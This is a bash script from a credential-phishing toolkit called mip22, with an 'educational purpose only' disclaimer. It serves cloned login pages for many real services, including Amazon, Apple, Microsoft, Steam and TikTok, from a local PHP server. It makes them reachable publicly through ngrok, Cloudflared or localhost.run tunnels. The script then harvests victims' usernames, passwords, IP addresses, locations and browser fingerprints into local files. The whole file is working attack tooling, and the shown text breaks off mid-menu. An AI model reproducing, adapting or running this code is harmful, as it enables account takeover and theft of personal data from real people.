mip22.sh 35 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929394959697989910010110210310410510610710810911011111211311411511611711811912012112212312412512612712812913013113213313413513613713813914014114214314414514614714814915015115215315415515615715815916016116216316416516616716816917017117217317417517617717817918018118218318418518618718818919019119219319419519619719819920020120220320420520620720820921021121221321421521621721821922022122222322422522622722822923023123223323423523623723823924024124224324424524624724824925025125225325425525625725825926026126226326426526626726826927027127227327427527627727827928028128228328428528628728828929029129229329429529629729829930030130230330430530630730830931031131231331431531631731831932032132232332432532632732832933033133233333433533633733833934034134234334434534634734834935035135235335435535635735835936036136236336436536636736836937037137237337437537637737837938038138238338438538638738838939039139239339439539639739839940040140240340440540640740840941041141241341441541641741841942042142242342442542642742842943043143243343443543643743843944044144244344444544644744844945045145245345445545645745845946046146246346446546646746846947047147247347447547647747847948048148248348448548648748848949049149249349449549649749849950050150250350450550650750850951051151251351451551651751851952052152252352452552652752852953053153253353453553653753853954054154254354454554654754854955055155255355455555655755855956056156256356456556656756856957057157257357457557657757857958058158258358458558658758858959059159259359459559659759859960060160260360460560660760860961061161261361461561661761861962062162262362462562662762862963063163263363463563663763863964064164264364464564664764864965065165265365465565665765865966066166266366466566666766866967067167267367467567667767867968068168268368468568668768868969069169269369469569669769869970070170270370470570670770870971071171271371471571671771871972072172272372472572672772872973073173273373473573673773873974074174274374474574674774874975075175275375475575675775875976076176276376476576676776876977077177277377477577677777877978078178278378478578678778878979079179279379479579679779879980080180280380480580680780880981081181281381481581681781881982082182282382482582682782882983083183283383483583683783883984084184284384484584684784884985085185285385485585685785885986086186286386486586686786886987087187287387487587687787887988088188288388488588688788888989089189289389489589689789889990090190290390490590690790890991091191291391491591691791891992092192292392492592692792892993093193293393493593693793893994094194294394494594694794894995095195295395495595695795895996096196296396496596696796896997097197297397497597697797897998098198298398498598698798898999099199299399499599699799899910001001100210031004100510061007100810091010101110121013101410151016101710181019102010211022102310241025102610271028102910301031103210331034103510361037103810391040104110421043104410451046104710481049105010511052105310541055105610571058105910601061106210631064106510661067106810691070107110721073107410751076107710781079108010811082108310841085108610871088108910901091109210931094109510961097109810991100110111021103110411051106110711081109111011111112111311141115111611171118111911201121112211231124112511261127112811291130113111321133113411351136113711381139114011411142114311441145114611471148114911501151115211531154115511561157115811591160116111621163116411651166116711681169117011711172117311741175117611771178117911801181118211831184118511861187118811891190119111921193119411951196119711981199120012011202120312041205120612071208120912101211121212131214121512161217121812191220122112221223122412251226122712281229123012311232123312341235123612371238123912401241124212431244124512461247124812491250125112521253125412551256125712581259126012611262126312641265126612671268126912701271127212731274127512761277127812791280128112821283128412851286128712881289129012911292129312941295129612971298129913001301130213031304130513061307130813091310131113121313131413151316131713181319132013211322132313241325132613271328132913301331133213331334133513361337133813391340134113421343134413451346134713481349135013511352135313541355
  1. #!/bin/bash
  2. #
  3. # Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
  4. # mip22 is a advanced phishing tool.
  5. #
  6. # mip22 is free software: you can redistribute it and/or modify
  7. # it under the terms of the GNU Affero General Public License as published by
  8. # the Free Software Foundation, either version 3 of the License, or
  9. # (at your option) any later version.
  10. #
  11. # mip22 is distributed in the hope that it will be useful,
  12. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. # GNU Affero General Public License for more details.
  15. #
  16. # You should have received a copy of the GNU Affero General Public License
  17. # along with this program. If not, see <http://www.gnu.org/licenses/>.
  18. #
  19. #
  20. #permissions
  21. chmod -R 777 packages.sh
  22. chmod -R 777 tunnels.sh
  23. chmod -R 777 data.txt
  24. chmod -R 777 fingerprints.txt
  25. chmod -R 777 .host
  26. chmod -R 777 .manual_attack
  27. chmod -R 777 .music
  28. chmod -R 777 .pages
  29. chmod -R 777 .tunnels_log
  30. chmod -R 777 .www
  31. #Install packages and tunnels
  32. check_os_and_install_packages() {
  33. if [[ -f .host/ngrok && -f .host/cloudflared ]]; then
  34. { clear; }
  35. else
  36. { clear; header; }
  37. OS_SYSTEM=$(uname -o)
  38. if [ $OS_SYSTEM != Android ]; then
  39. bash packages.sh
  40. bash tunnels.sh
  41. else
  42. ./packages.sh
  43. ./tunnels.sh
  44. fi
  45. fi
  46. }
  47. # Check os for root
  48. check_root_and_os() {
  49. OS_SYSTEM=$(uname -o)
  50. if [ $OS_SYSTEM != Android ]; then
  51. if [[ "${EUID:-$(id -u)}" -ne 0 ]]; then
  52. { clear; header; }
  53. echo -e "The program cannot run.\nFor run program in GNU/Linux Operating System,\nGive root privileges and try again. \n"
  54. exit 1
  55. fi
  56. fi
  57. }
  58. # Terminal Colors
  59. RED="$(printf '\033[31m')"
  60. GREEN="$(printf '\033[32m')"
  61. ORANGE="$(printf '\033[33m')"
  62. BLUE="$(printf '\033[34m')"
  63. MAGENTA="$(printf '\033[35m')"
  64. CYAN="$(printf '\033[36m')"
  65. WHITE="$(printf '\033[37m')"
  66. BLACK="$(printf '\033[30m')"
  67. ORANGEBG="$(printf '\033[43m')"
  68. BLUEBG="$(printf '\033[44m')"
  69. RESETFG="$(printf '\e033[0m')"
  70. RESETBG="$(printf '\e[0m\n')"
  71. # Directories
  72. if [[ ! -d ".host" ]]; then
  73. mkdir -p ".host"
  74. fi
  75. if [[ ! -d ".www" ]]; then
  76. mkdir -p ".www"
  77. fi
  78. # Clear content of log files
  79. truncate -s 0 .tunnels_log/.cloudfl.log
  80. truncate -s 0 .tunnels_log/.localrun.log
  81. pid_kill() {
  82. #kill all pid for php, ngrok and cloudflared
  83. if [[ `pidof php` ]]; then
  84. killall php > /dev/null 2>&1
  85. fi
  86. if [[ `pidof ngrok` ]]; then
  87. killall ngrok > /dev/null 2>&1
  88. fi
  89. if [[ `pidof cloudflared` ]]; then
  90. killall cloudflared > /dev/null 2>&1
  91. fi
  92. }
  93. header(){
  94. printf "${BLUE}"
  95. cat <<- EOF
  96. ${BLUE} ███╗ ███╗██╗███████╗███████╗██╗ ██████╗ ███╗ ██╗███████╗ ${RED} o
  97. ${BLUE} ████╗ ████║██║██╔════╝██╔════╝██║██╔═══██╗████╗ ██║██╔════╝ ${RED} d8b
  98. ${BLUE} ██╔████╔██║██║███████╗███████╗██║██║ ██║██╔██╗ ██║███████╗ ${RED} d888b
  99. ${BLUE} ██║╚██╔╝██║██║╚════██║╚════██║██║██║ ██║██║╚██╗██║╚════██║ ${RED}"Y888888888P"
  100. ${BLUE} ██║ ╚═╝ ██║██║███████║███████║██║╚██████╔╝██║ ╚████║███████║ ${RED} "Y88888P"
  101. ${BLUE} ╚═╝ ╚═╝╚═╝╚══════╝╚══════╝╚═╝ ╚═════╝ ╚═╝ ╚═══╝╚══════╝ ${RED} d88P"Y88b
  102. ${BLUE} ██╗███╗ ███╗██████╗ ██████╗ ███████╗███████╗██╗██████╗ ██╗ ███████╗███████╗ ${RED}dP" "Yb
  103. ${BLUE} ██║████╗ ████║██╔══██╗██╔═══██╗██╔════╝██╔════╝██║██╔══██╗██║ ██╔════╝██╔════╝
  104. ${BLUE} ██║██╔████╔██║██████╔╝██║ ██║███████╗███████╗██║██████╔╝██║ █████╗ ███████╗ d88b d88b
  105. ${BLUE} ██║██║╚██╔╝██║██╔═══╝ ██║ ██║╚════██║╚════██║██║██╔══██╗██║ ██╔══╝ ╚════██║ " dP " dP
  106. ${BLUE} ██║██║ ╚═╝ ██║██║ ╚██████╔╝███████║███████║██║██████╔╝███████╗███████╗███████║ dP dP
  107. ${BLUE} ═╝╚═╝ ╚═╝╚═╝ ╚═════╝ ╚══════╝╚══════╝╚═╝╚═════╝ ╚══════╝╚══════╝╚══════╝ d888 d888
  108. ${BLUE}
  109. ${CYAN}Mip22 tool made for educational purpose only. ${ORANGE}Version: 1.0
  110. ${CYAN}The author is not responsible for any malicious use of the program.
  111. ${CYAN} Mip Created by ${ORANGE}makdosx ${CYAN}(https://github.com/makdosx) ${WHITE}
  112. EOF
  113. printf "${RESETBG}"
  114. }
  115. # Php webserver and port
  116. host='127.0.0.1'
  117. port='8080'
  118. setup_clone(){
  119. # Setup cloned page and server
  120. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Setting up cloned page..."${WHITE}
  121. rm -rf .www/*
  122. cp -rf .pages/"$site"/* .www
  123. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Starting your php server..."${WHITE}
  124. cd .www && php -S "$host":"$port" > /dev/null 2>&1 &
  125. }
  126. setup_clone_manual() {
  127. rm -rf .www/*
  128. cp -rf .manual_attack/index.html .www
  129. cp -rf .manual_attack/post.php .www
  130. cp -rf .manual_attack/data.txt .www
  131. cp -rf .manual_attack/__ROOT__/index.php .www
  132. cp -rf .manual_attack/__ROOT__/fingerprints.php .www
  133. rm -rf .manual_attack/index.html
  134. rm -rf .manual_attack/post.php
  135. rm -rf .manual_attack/data.txt
  136. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Starting your php server..."${WHITE}
  137. cd .www && php -S "$host":"$port" > /dev/null 2>&1 &
  138. }
  139. ## Get IP address
  140. get_fingerprints() {
  141. IP=$(grep -a 'IP:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  142. Full_Date=$(grep -a 'Full-Date:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  143. Country=$(grep -a 'Country:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  144. Region=$(grep -a 'Region:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  145. City=$(grep -a 'City:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  146. User_Agent=$(grep -a 'User-Agent:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  147. OS_System=$(grep -a 'OS-System:.*' .www/fingerprints.txt | cut -d " " -f2 | tr -d '\r')
  148. IFS=$'\n'
  149. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Victim Fingerprints.. "
  150. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} IP: ${BLUE}$IP"
  151. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Full Date: ${BLUE}$Full_Date"
  152. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Country: ${BLUE}$Country"
  153. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Region: ${BLUE}$Region"
  154. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} City: ${BLUE}$City"
  155. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} User-Agent: ${BLUE}$User_Agent"
  156. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} OS System: ${BLUE}$OS_System"
  157. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${BLUE} Saved in : ${MAGENTA}fingerprints.txt"
  158. cat .www/fingerprints.txt >> fingerprints.txt
  159. }
  160. # Get credentials from victims
  161. get_creds() {
  162. ACC=$(grep -o 'Username:.*' .www/data.txt | cut -d " " -f2)
  163. PASS=$(grep -o 'Password:.*' .www/data.txt | cut -d ":" -f2)
  164. IFS=$'\n'
  165. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Account : ${WHITE}$ACC"
  166. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Password : ${WHITE}$PASS"
  167. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Saved in : ${ORANGE}data.txt"
  168. cat .www/data.txt >> data.txt
  169. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Next Fingerptints and Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
  170. }
  171. # Get credentials from victims manual method
  172. get_creds_manual() {
  173. ACC=$(tail -n 20 .www/data.txt)
  174. IFS=$'\n'
  175. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Account : ${WHITE}$ACC"
  176. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Saved in : ${ORANGE}data.txt"
  177. cat .www/data.txt >> data.txt
  178. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
  179. }
  180. # Print credentials from victim
  181. credentials() {
  182. echo -ne "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Waiting for Victim fingerprints and Login Info.. ${BLUE}Ctrl + C ${MAGENTA}to exit..."
  183. while true; do
  184. if [[ -e ".www/fingerprints.txt" ]]; then
  185. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Fingerprints Victim Found!"
  186. get_fingerprints
  187. rm -rf .www/fingerprints.txt
  188. fi
  189. sleep 0.75
  190. if [[ -e ".www/data.txt" ]]; then
  191. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Login info Found !"
  192. get_creds
  193. rm -rf .www/data.txt
  194. fi
  195. sleep 0.75
  196. done
  197. }
  198. # Print credentials from victim manual
  199. credentials_manual() {
  200. while true; do
  201. if [[ -e ".www/fingerprints.txt" ]]; then
  202. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Fingerprints Victim Found!"
  203. get_fingerprints
  204. rm -rf .www/fingerprints.txt
  205. fi
  206. sleep 0.75
  207. if [[ -e ".www/data.txt" ]]; then
  208. echo -e "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Login info Found !"
  209. get_creds_manual
  210. rm -rf .www/data.txt
  211. fi
  212. sleep 0.75
  213. done
  214. }
  215. # Localhost Start
  216. localhost_start() {
  217. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${GREEN}( ${CYAN}http://$host:$port ${GREEN})"
  218. setup_clone
  219. { sleep 1; clear; header; }
  220. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Successfully Hosted in : ${GREEN}${CYAN}http://$host:$port ${GREEN}"
  221. credentials
  222. }
  223. # Localhost Start
  224. localhost_start_manual() {
  225. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${GREEN}( ${CYAN}http://$host:$port ${GREEN})"
  226. setup_clone_manual
  227. { sleep 1; clear; header; }
  228. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Successfully Hosted in : ${GREEN}${CYAN}http://$host:$port ${GREEN}"
  229. credentials_manual
  230. }
  231. #ngrok token setup
  232. ngrok_setup_token() {
  233. { clear; header; echo; }
  234. cat <<- EOF
  235. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Ngrok Toekn
  236. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  237. EOF
  238. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  239. case $REPLY in
  240. 1)
  241. echo "Please insert yout ngrok authtoken (only key):"
  242. read authtoken
  243. if [[ `command -v termux-chroot` ]]; then
  244. termux-chroot ./.host/ngrok authtoken $authtoken
  245. sleep 2 && menu
  246. else
  247. ./.host/ngrok authtoken $authtoken
  248. sleep 2 && menu
  249. fi ;;
  250. 99) menu;;
  251. *)
  252. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  253. { sleep 0.7; ngrok_setup_token;};;
  254. esac
  255. }
  256. apis() {
  257. { clear; header; echo; }
  258. cat <<- EOF
  259. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Ngrok
  260. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  261. EOF
  262. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  263. case $REPLY in
  264. 1) ngrok_setup_token;;
  265. 99) menu;;
  266. *)
  267. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Api, Try Again..."
  268. { sleep 0.7; apis;};;
  269. esac
  270. }
  271. # Start ngrok
  272. ngrok_start() {
  273. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  274. { sleep 1; setup_clone; }
  275. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Ngrok..."
  276. if [[ `command -v termux-chroot` ]]; then
  277. sleep 2 && termux-chroot ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  278. else
  279. sleep 2 && ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  280. fi
  281. { sleep 9; clear; header; }
  282. ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
  283. ngrok_url1=${ngrok_url#https://}
  284. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$ngrok_url1"
  285. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$ngrok_url"
  286. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$ngrok_url1"
  287. credentials
  288. }
  289. # Start ngrok
  290. ngrok_start_manual() {
  291. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  292. { sleep 1; setup_clone_manual; }
  293. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Ngrok..."
  294. if [[ `command -v termux-chroot` ]]; then
  295. sleep 2 && termux-chroot ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  296. else
  297. sleep 2 && ./.host/ngrok http "$host":"$port" > /dev/null 2>&1 &
  298. fi
  299. { sleep 9; clear; header; }
  300. ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
  301. ngrok_url1=${ngrok_url#https://}
  302. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$ngrok_url1"
  303. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$ngrok_url"
  304. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$ngrok_url1"
  305. credentials_manual
  306. }
  307. # Start Cloudflared
  308. #
  309. cloudflared_start() {
  310. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${GREEN})"
  311. { sleep 1; setup_clone; }
  312. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGETNA} Launching Cloudflared..."
  313. if [[ `command -v termux-chroot` ]]; then
  314. sleep 2 && termux-chroot ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  315. else
  316. sleep 2 && ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  317. fi
  318. { sleep 9; clear; header; }
  319. cldflr_url=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".tunnels_log/.cloudfl.log")
  320. cldflr_url1=${cldflr_url#https://}
  321. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$cldflr_url1"
  322. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$cldflr_url"
  323. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$cldflr_url1"
  324. credentials
  325. }
  326. # Start Cloudflared
  327. #
  328. cloudflared_start_manual() {
  329. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${GREEN})"
  330. { sleep 1; setup_clone_manual; }
  331. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching Cloudflared..."
  332. if [[ `command -v termux-chroot` ]]; then
  333. sleep 2 && termux-chroot ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  334. else
  335. sleep 2 && ./.host/cloudflared tunnel -url "$host":"$port" > .tunnels_log/.cloudfl.log 2>&1 & > /dev/null 2>&1 &
  336. fi
  337. { sleep 9; clear; header; }
  338. cldflr_url=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".tunnels_log/.cloudfl.log")
  339. cldflr_url1=${cldflr_url#https://}
  340. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$cldflr_url1"
  341. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http(s) : ${GREEN}$cldflr_url"
  342. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$cldflr_url1"
  343. credentials_manual
  344. }
  345. # Start localrun
  346. localhostrun_start() {
  347. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  348. { sleep 1; setup_clone; }
  349. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching LocalhostRun..."
  350. if [[ `command -v termux-chroot` ]]; then
  351. sleep 2 && termux-chroot ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  352. else
  353. sleep 2 && ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  354. fi
  355. { sleep 9; clear; header; }
  356. localrun_url=$(grep -o 'https://[-0-9a-z]*\.lhrtunnel.link' ".tunnels_log/.localrun.log")
  357. localrun_url1=${localrun_url#https://}
  358. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$localrun_url1"
  359. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL https(s) : ${GREEN}$localrun_url"
  360. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$localrun_url1"
  361. credentials
  362. }
  363. # Start localrun
  364. localhostrun_start_manual() {
  365. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Initializing... ${MAGENTA}( ${CYAN}http://$host:$port ${MAGENTA})"
  366. { sleep 1; setup_clone_manual; }
  367. echo -ne "\n\n${GREEN}[${WHITE}-${GREEN}]${MAGENTA} Launching LocalhostRun..."
  368. if [[ `command -v termux-chroot` ]]; then
  369. sleep 2 && termux-chroot ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  370. else
  371. sleep 2 && ssh -R "80":"$host":"$port" "nokey@localhost.run" > .tunnels_log/.localrun.log 2>&1 & > /dev/null 2>&1 &
  372. fi
  373. { sleep 9; clear; header; }
  374. localrun_url=$(grep -o 'https://[-0-9a-z]*\.lhrtunnel.link' ".tunnels_log/.localrun.log")
  375. localrun_url1=${localrun_url#https://}
  376. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL http : ${GREEN}http://$localrun_url1"
  377. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL https(s) : ${GREEN}$localrun_url"
  378. echo -e "\n${GREEN}[${WHITE}-${GREEN}]${WHITE} URL subdomain : ${GREEN}$subdomain@$localrun_url1"
  379. credentials_manual
  380. }
  381. # Select Tunnel
  382. tunnel() {
  383. { clear; header; }
  384. cat <<- EOF
  385. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Localhost ${MAGENTA} (for practise only)
  386. ${GREEN}[${WHITE}2${GREEN}]${CYAN} LocalhostRun ${MAGENTA} (alternative)
  387. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Cloudflared ${MAGENTA} (recommended)
  388. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Ngrok ${MAGENTA} (first install token from menu)
  389. EOF
  390. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select a port forwarding service : ${WHITE}"
  391. case $REPLY in
  392. 1)
  393. localhost_start;;
  394. 2)
  395. localhostrun_start;;
  396. 3)
  397. cloudflared_start;;
  398. 4)
  399. ngrok_start;;
  400. *)
  401. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  402. { sleep 1; header; tunnel;};;
  403. esac
  404. }
  405. start_manual_method() {
  406. cd .manual_attack && php -S "127.0.0.1:8081" > /dev/null 2>&1 &
  407. echo -e "\n${GREEN}[${WHITE}-${GREEN}] ${GREEN} Visit ${WHITE} http://127.0.0.1:8081 ${GREEN} for setup clone page "${WHITE}
  408. echo -e "\n${GREEN}[${WHITE}-${GREEN}] ${GREEN} After setup clone page return to here and continue... "${WHITE}
  409. }
  410. # Select Tunnel
  411. tunnel_manual() {
  412. { clear; header; }
  413. start_manual_method
  414. cat <<- EOF
  415. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Localhost ${MAGENTA} (for practise only)
  416. ${GREEN}[${WHITE}2${GREEN}]${CYAN} LocalhostRun ${MAGENTA} (alternative)
  417. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Cloudflared ${MAGENTA} (recommended)
  418. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Ngrok ${MAGENTA} (first install token from menu)
  419. EOF
  420. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select a port forwarding service : ${WHITE}"
  421. case $REPLY in
  422. 1)
  423. localhost_start_manual;;
  424. 2)
  425. localhostrun_start_manual;;
  426. 3)
  427. cloudflared_start_manual;;
  428. 4)
  429. ngrok_start_manual;;
  430. *)
  431. echo -ne "\n${GREEN}[${WHITE}!${GREEN}]${RED} Invalid Option, Try Again..."
  432. { sleep 1; header; tunnel;};;
  433. esac
  434. }
  435. vpn_setup() {
  436. { clear; header; echo; }
  437. cat <<- EOF
  438. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Psiphon Vpn
  439. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  440. EOF
  441. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Api : ${WHITE}"${WHITE}
  442. case $REPLY in
  443. 1)
  444. if [[ `command -v termux-chroot` ]]; then
  445. echo "https://play.google.com/store/apps/details?id=com.psiphon3.subscription"
  446. sleep 4 && menu
  447. else
  448. echo "https://play.google.com/store/apps/details?id=com.psiphon3.subscription"
  449. #echo 'Not Supported. Setup your vpn manual'
  450. sleep 4 && menu
  451. fi ;;
  452. 99) menu;;
  453. *)
  454. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
  455. { sleep 0.7; ngrok_setup_token;};;
  456. esac
  457. }
  458. play_music() {
  459. { clear; header; }
  460. cat <<- EOF
  461. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Play Music
  462. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Stop Music
  463. ${GREEN}[${WHITE}99${GREEN}]${CYAN} Main Menu
  464. ${MAGENTA} If you select this option which is the background music then you may
  465. ${MAGENTA} not see the attacker's details directly in the terminal.
  466. ${MAGENTA} If you not seen the data pause the music and restart the program again.
  467. ${MAGENTA} However, they have been saved in the data txt file.
  468. EOF
  469. read -p "${GREEN}[${WHITE}-${GREEN}]${GREEN} Select Option : ${WHITE}"${WHITE}
  470. case $REPLY in
  471. 1)
  472. xterm -e nohup mpv .music/mis_song.mp3 > /dev/null 2>&1
  473. menu;;
  474. 2)
  475. pidof mpv && killall mpv > /dev/null 2>&1
  476. menu;;
  477. 99)
  478. menu;;
  479. *)
  480. echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again...";;
  481. esac
  482. }
  483. attack() {
  484. { clear; header; echo; }
  485. cat <<- EOF
  486. ${GREEN}[${WHITE}1${GREEN}]${CYAN} Adobe ${GREEN}[${WHITE}25${GREEN}]${CYAN} Line ${GREEN}[${WHITE}48${GREEN}]${CYAN} Socialclub
  487. ${GREEN}[${WHITE}2${GREEN}]${CYAN} Amazon ${GREEN}[${WHITE}26${GREEN}]${CYAN} LinkedIn ${GREEN}[${WHITE}49${GREEN}]${CYAN} Spotify
  488. ${GREEN}[${WHITE}3${GREEN}]${CYAN} Apple ${GREEN}[${WHITE}27${GREEN}]${CYAN} Livejournal ${GREEN}[${WHITE}50${GREEN}]${CYAN} Stackoverflow
  489. ${GREEN}[${WHITE}4${GREEN}]${CYAN} Baddo ${GREEN}[${WHITE}28${GREEN}]${CYAN} Mediafire ${GREEN}[${WHITE}51${GREEN}]${CYAN} Steam
  490. ${GREEN}[${WHITE}5${GREEN}]${CYAN} Care2 ${GREEN}[${WHITE}29${GREEN}]${CYAN} MeWe ${GREEN}[${WHITE}52${GREEN}]${CYAN} Tagged
  491. ${GREEN}[${WHITE}6${GREEN}]${CYAN} Clashofclans ${GREEN}[${WHITE}30${GREEN}]${CYAN} Microsoft ${GREEN}[${WHITE}53${GREEN}]${CYAN} Telegram
  492. ${GREEN}[${WHITE}7${GREEN}]${CYAN} Crunchyroll ${GREEN}[${WHITE}31${GREEN}]${CYAN} Mocospace ${GREEN}[${WHITE}54${GREEN}]${CYAN} Tiktok
  493. ${GREEN}[${WHITE}8${GREEN}]${CYAN} Deviantart ${GREEN}[${WHITE}32${GREEN}]${CYAN} Myspace ${GREEN}[${WHITE}55${GREEN}]${CYAN} Tiktok Followers
